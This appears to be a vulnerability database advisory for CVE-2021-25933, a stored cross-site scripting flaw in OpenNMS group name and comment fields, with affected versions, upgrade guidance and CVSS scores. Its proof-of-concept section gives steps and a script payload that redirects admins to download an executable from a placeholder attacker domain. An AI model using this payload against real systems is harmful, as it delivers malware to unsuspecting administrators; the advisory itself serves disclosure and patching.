Mend.io Vulnerability Database

What is a CVE vulnerability ID? icon What is a WS vulnerability ID? icon What is an MSC vulnerability ID? icon
New vulnerability? Tell us about it!
icon

We found results for “

CVE-2021-25933

Date: May 20, 2021

Overview

in OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to Stored Cross-Site Scripting, since the function `validateFormInput()` performs improper validation checks on the input sent to the `groupName` and `groupComment` parameters. Due to this flaw, an authenticated attacker could inject arbitrary script and trick other admin users into downloading malicious files which can cause severe damage to the organization using opennms.

Details

The module `opennms` can be abused by Stored Cross-Site Scripting vulnerability since the function `validateFormInput()` performs improper validation checks on the input sent to the `groupName` and `groupComment` parameters. Due to this flaw, an authenticated attacker could inject arbitrary script and trick other admin users into downloading malicious files which can cause severe damage to the organization using opennms. The `validateFormInput()` function simply adds a new user to a group on the server and accepts user input via `groupName` and `groupComment` parameters. Due to lack of validation on the value passed into the parameter, an attacker can supply a crafted arbitrary script and execute it in the context of the logged in user.

PoC Details

Login to the application and navigate to the opennms/admin/userGroupView/groups/list.htm endpoint. Click on “Add New Group". Insert the payload into the “Group Name" and “Comment" fields and click “OK". You’ll be redirected to the page below. Scroll to the bottom and click “Finish". Now you’ll be presented with a pop-up indicating the successful execution of the script. A malicious attacker can download potential malware in the victim's system using the below payload.

PoC Code

<script>window.location = http://<Attacker-domain>/malicious.exe</script>

Affected Environments

opennms-1-0-stable, opennms-1.0.1 through opennms-27.1.0-1, meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1, meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1

Prevention

Upgrade to Horizon 27.1.1, Meridian 2020.1.7 or Meridian 2019.1.19

Language: Java

Good to know:

icon
icon

Cross-Site Scripting (XSS)

CWE-79
icon

Upgrade Version

Upgrade to version org.opennms:opennms:27.1.1, org.opennms:opennms-config:27.1.1

Learn More

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): High
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): Single
Confidentiality (C): None
Integrity (I): Partial
Availability (A): None
Additional information:

Related Resources (7)

https://github.com/OpenNMS/opennms/commit/8a97e6869d6e49da18b208c837438ace80049c01%2C
https://github.com/OpenNMS/opennms/commit/f3ebfa3da5352b4d57f238b54c6db315ad99f10e
https://github.com/OpenNMS/opennms/commit/8a97e6869d6e49da18b208c837438ace80049c01,
https://github.com/OpenNMS/opennms/commit/eb08b5ed4c5548f3e941a1f0d0363ae4439fa98c
https://nvd.nist.gov/vuln/detail/CVE-2021-25933
https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25933
https://www.mend.io/vulnerability-database/CVE-2021-25933